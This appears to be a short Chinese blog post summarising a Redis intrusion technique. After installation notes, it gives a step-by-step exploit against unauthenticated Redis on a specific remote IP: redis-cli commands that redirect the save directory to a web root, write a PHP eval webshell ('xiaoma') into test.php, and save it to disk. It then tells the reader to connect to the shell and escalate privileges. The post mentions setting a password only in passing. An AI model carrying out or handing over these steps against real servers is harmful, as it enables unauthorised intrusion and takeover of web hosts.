redis入侵小結

標籤：

Redis安裝：

 

Windows安裝包：http://pan.baidu.com/s/1i3jLlC5

 

下載下來之後，開始安裝：

 

Redis-server.exe redis.conf：

 

 

簡單一步，安裝成功，保持這個Windows持續運行~

 

查看一下我們原生連接埠，可以看到多了一個6379連接埠，安全風險來了，記得設定redis的密碼~

 

 

接下來，開始利用redis-cli.exe來進行遠程redis的入侵：

 

如果遠程redis資料庫存在未授權訪問漏洞，則可以直接上傳shell：

 

開啟redis用戶端：

 

redis-cli -h 125.39.185.150 -p 6379

 

接下來，設定記憶體資料：

 

Config set dir /var/www/html（在記憶體中設定切換的web目錄/var/www/html）

 

Config set dbfilename test.php（在記憶體中的/var/www/html目錄下建立一個test.php檔案）

 

Set xiaoma “<?php @eval($_POST[mi]);?>”（設定key-value，此時該值在Memory中）

 

Save （將Memory中的key-value儲存到硬碟，並儲存為test.php檔案）

 

四個OK就搞定了~

 

 

此時，就可以直接連shell，開始提權了~

 

redis入侵參考：

 

http://www.wooyun.org/bugs/wooyun-2015-0101465

 

http://www.wooyun.org/bugs/wooyun-2010-0105096

 

redis入侵小結